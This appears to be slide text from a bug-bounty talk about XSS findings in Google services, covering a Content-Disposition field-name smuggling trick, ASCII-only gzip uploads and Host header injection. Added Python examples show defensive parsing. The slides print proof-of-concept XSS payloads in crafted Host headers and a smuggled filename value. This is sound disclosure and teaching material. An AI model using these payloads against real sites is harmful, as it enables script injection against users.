or just a waste of time
• Michał Bentkowski
• Pentester @ securitum.pl
• IT security interests:
  • Client-side issues,
  • Browser quirks,
• Top 10 Google VRP reporters in 2014
• Social:
  • Blog: blog.bentkowski.info
  • @SecurityMB
  • sekurak.pl (PL)
• Deal between companies and security researchers,
• Lots of bug bounty programs,
• Google Vulnerability Reward Program (VRP)
• https://www.google.pl/about/appsecurity/reward-program/
• QuickOffice - mobile productivity suite
• Acquired by Google in 2012
• Incorporated into Google Docs in 2014
• But they’re not dead…
• issues.quickoffice.com and issues2.quickoffice.com hosted JIRA
• https://confluence.atlassian.com/jira/jira-security-advisory-2014-02-26-445188412.html
• My favourite XSS
• Postini Header Analyzer (http://www.google.com/postini/headeranalyzer)
• Wikipedia: „Postini was an e-mail, Web security, and archiving service owned by Google since 2007. It provided cloud computing services for filtering e-mail spam and malware (before it was delivered to a client's mail server), offered optional e-mail archiving, and protected client networks from web-borne malware.”
X-pstn-levels: (S: 0.00000/60.95723 CV:99.9000 R:95.91080 P: 95.91081 M:64.93900 C:93.23770 )
X-pstn-settings: 5 (2.00000:8.00000) r p M c
• But it’s XSS via upload form…
• So an upload dialog box is always needed.
• The attack scenario?
  • The attacker sends a maliciously crafted ZIP file to the victim,
  • The attacker needs to lure the victim onto the vulnerable page,
  • The victim needs to click on the upload button, then MANUALLY select the file (s)he received from the attacker,
  • The victim needs to confirm the upload.
• Can we make an upload in such a way that the server sees it as a file upload while it’s a typical POST form from the browser’s perspective?
• This application actually splits the string on semicolon.
• <input name="file_1; name=file_1; filename=test.zip; a">
• Content-Disposition: form-data; name="file_1; name=file_1; filename=test.zip; a"
• After splitting on ";" the server sees name=file_1 and filename=test.zip, so an ordinary text field is treated as a file upload.
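Added example (not from the talk): the naive semicolon-split parser the slide describes beside a quoted-string-aware one, run on the crafted Content-Disposition header above; both header strings are constructed here.

```python
# Added example (not from the talk): two ways of parsing the Content-Disposition
# header of a multipart/form-data part. naive_parse() reproduces the behaviour the
# slide describes (split on ';'), strict_parse() honours quoted strings.
import re

# The header Chrome sends for the crafted <input name="..."> from the slide (constructed)
CRAFTED = 'form-data; name="file_1; name=file_1; filename=test.zip; a"'
# The header of a genuine file upload, for comparison (constructed)
GENUINE = 'form-data; name="file_1"; filename="report.zip"'

def naive_parse(header):
    """Quirky behaviour: split on ';' and strip quotes, ignoring quoting rules."""
    params = {}
    for piece in header.split(';')[1:]:
        if '=' in piece:
            key, value = piece.strip().split('=', 1)
            params[key.strip().lower()] = value.strip().strip('"')
    return params

# One parameter: ';' key '=' (quoted-string | token). A quoted string may contain
# ';' and '=' freely, so they are never treated as separators inside it.
_PARAM = re.compile(r';\s*([\w-]+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;\s]*))')

def strict_parse(header):
    """Quoted-string-aware parser (assumes RFC 2183 attribute syntax, no trailing junk)."""
    _, sep, rest = header.partition(';')
    rest = sep + rest
    params = {}
    pos = 0
    while pos < len(rest):
        m = _PARAM.match(rest, pos)
        if not m:
            raise ValueError('malformed Content-Disposition at offset %d' % pos)
        quoted, token = m.group(2), m.group(3)
        params[m.group(1).lower()] = token if quoted is None else quoted.replace('\\"', '"')
        pos = m.end()
        while pos < len(rest) and rest[pos] in ' \t':   # whitespace before next ';'
            pos += 1
    return params

def looks_like_file_upload(header, parser=strict_parse):
    """Server-side decision: only a part with a filename parameter is a file upload."""
    return 'filename' in parser(header)
```

With the strict parser the crafted field keeps its whole quoted name and yields no filename, so it is handled as a plain form field.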
• Chrome tried to interpret the data in some encoding.
• Unknown byte sequence in that encoding? Chrome turns it into an HTML entity!
• 0x00 - 0x9F - allowed bytes
• Rest (0xA0 - 0xFF) - forbidden bytes (characters)
• Problem with ZIP. Why not TAR?
• GZIP structure:
  • 10-byte header,
  • Body - containing a DEFLATE stream,
  • 8-byte footer: CRC32 checksum and original file length.
• 10-byte header - no forbidden characters,
• 8-byte footer - easy to get rid of forbidden characters,
• Body?
• https://github.com/molnarg/ascii-zip
• „A deflate compressor that emits compressed data that is in the [A-Za-z0-9] ASCII byte range.”
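Added example (not from the talk): a parser that walks the gzip member layout above and verifies the 8-byte trailer against the inflated body, the check an upload handler should make before trusting an archive; the sample input is constructed with Python's own gzip module.

```python
# Added example (not from the talk): walk the gzip member layout the slide describes
# (10-byte header, raw DEFLATE body, 8-byte CRC32/ISIZE trailer) and verify the
# trailer against the inflated data, which is the check an upload handler should make.
import gzip
import struct
import zlib

SAMPLE = b'hello from the upload handler test\n' * 20   # constructed input
GZ = gzip.compress(SAMPLE)                               # single-member gzip blob

def parse_gzip_member(blob):
    """Return (header dict, raw DEFLATE body, trailer dict) for one gzip member."""
    if len(blob) < 18:
        raise ValueError('too short for a gzip member')
    id1, id2, cm, flg, mtime, xfl, os_ = struct.unpack('<BBBBIBB', blob[:10])
    if (id1, id2) != (0x1F, 0x8B) or cm != 8:
        raise ValueError('not a gzip member with DEFLATE compression')
    if flg & 0xE0:
        raise ValueError('reserved FLG bits set')
    pos = 10
    # Optional header fields selected by FLG (RFC 1952): FEXTRA, FNAME, FCOMMENT, FHCRC
    if flg & 0x04:
        xlen, = struct.unpack('<H', blob[pos:pos + 2])
        pos += 2 + xlen
    for bit in (0x08, 0x10):                      # zero-terminated name / comment
        if flg & bit:
            pos = blob.index(b'\x00', pos) + 1
    if flg & 0x02:                                # 16-bit header CRC
        pos += 2
    header = {'flg': flg, 'mtime': mtime, 'xfl': xfl, 'os': os_, 'length': pos}
    crc32, isize = struct.unpack('<II', blob[-8:])
    return header, blob[pos:-8], {'crc32': crc32, 'isize': isize}

def verify_gzip(blob):
    """Inflate the body and return (trailer_ok, data); trailer_ok is False on mismatch."""
    header, body, trailer = parse_gzip_member(blob)
    data = zlib.decompress(body, wbits=-15)       # negative wbits = raw DEFLATE stream
    crc_ok = (zlib.crc32(data) & 0xFFFFFFFF) == trailer['crc32']
    size_ok = (len(data) % 2 ** 32) == trailer['isize']   # ISIZE is length mod 2^32
    return crc_ok and size_ok, data
```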
• Lessons learnt?
• Always try to find quirks in web servers; they may behave in a non-standard way.
• When something doesn’t work in one browser, try in others.
• Known misbehaviour of Internet Explorer
• Found by Sergey Bobrov (@black2fan) in 2013
• Found some quirk in Google’s parsing of the Host header
• Let the hunting begin!
HTTP/1.1 302 Found
Date: Fri, 06 Mar 2015 08:35:32 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.36-0+deb7u3
Location: http://example.com/login.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
HTTP/1.1 302 Found
Date: Fri, 06 Mar 2015 08:35:32 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.36-0+deb7u3
Location: http://example.com%2Flogin.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
GET /login.phphp/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: pl-PL
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: example.com/login.php
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
• Google Host header parsing
  • Host: www.google.com -> works
  • Host: www.google.com/test -> doesn’t work
  • Host: www.google.com:80 -> works
  • Host: www.google.com:80<anything> -> also works!
HTTP/1.1 302 Found
Server: Apache/2.2.22 (Debian)
Location: https://www.google.com%3a443%2fcse%2ftools%2fcreate_onthefly%3b%3c%2ftextarea%3e%3cscript%3ealert(1)%3c%2fscript%3e

Host: www.google.com:443/cse/tools/create_onthefly;</textarea><script>alert(1)</script>
Location: https://www.google.com%3a443%2fcse%2ftools%2fcreate_onthefly%3b%3c%2ftextarea%3e%3csvg%2fonload%3dalert%28document%2edomain%29%3e%3b%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f

Host: www.google.com:443/cse/tools/create_onthefly;</textarea><svg/onload=alert(document.domain)>;/../../../../../../../../../../../../../../
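Added example (not from the talk): a strict Host header check that gives the verdicts a server should give for the Host values shown on the slides, plus a check on redirect targets whose authority carries percent-encoding like the Location header above; the allow-list and the case table are constructed here, and IPv6 literals are assumed out of scope.

```python
# Added example (not from the talk): a strict Host header check that rejects the
# malformed values shown on the slides, plus a check on redirect targets whose
# authority carries percent-encoding (the trigger for the IE behaviour shown above).
# Assumption: hosts are DNS names or IPv4 literals; IPv6 literals are left out.
import re
from urllib.parse import urlsplit

# RFC 7230: Host = uri-host [ ":" port ]   (reg-name / IPv4 only, see assumption above)
_HOST_RE = re.compile(
    r'^(?P<host>[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?)(?::(?P<port>\d{1,5}))?$')

def parse_host_header(value, allowed_hosts):
    """Return (host, port-or-None) for a well-formed, allow-listed Host; otherwise None."""
    m = _HOST_RE.match(value)
    if not m:
        return None                      # slash, '<', spaces etc. are all rejected here
    host = m.group('host').lower()
    port = int(m.group('port')) if m.group('port') else None
    if port is not None and not 0 < port < 65536:
        return None
    return (host, port) if host in allowed_hosts else None

# Host values from the slides and the verdict a strict parser should give (constructed table)
HOST_CASES = {
    'www.google.com': True,
    'www.google.com/test': False,
    'www.google.com:80': True,
    'www.google.com:80<anything>': False,
    'example.com/login.php': False,
}

def check_host_cases(allowed_hosts=frozenset({'www.google.com', 'example.com'})):
    """Return the cases where parse_host_header disagrees with the expected verdict."""
    return [h for h, ok in HOST_CASES.items()
            if (parse_host_header(h, allowed_hosts) is not None) != ok]

def location_authority_is_clean(location):
    """True only for absolute http(s) URLs whose authority has no percent-encoding."""
    parts = urlsplit(location)
    return parts.scheme in ('http', 'https') and bool(parts.netloc) and '%' not in parts.netloc
```

Reflecting a Host value that passed this check into a page still needs output encoding; the check only removes the "anything after the port" class of values.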
• I really enjoy my participation in Google VRP,
• Great way to enhance my skills as well as to get some money,
• Learn about browsers, try to fuzz servers,
• Be a bit lucky!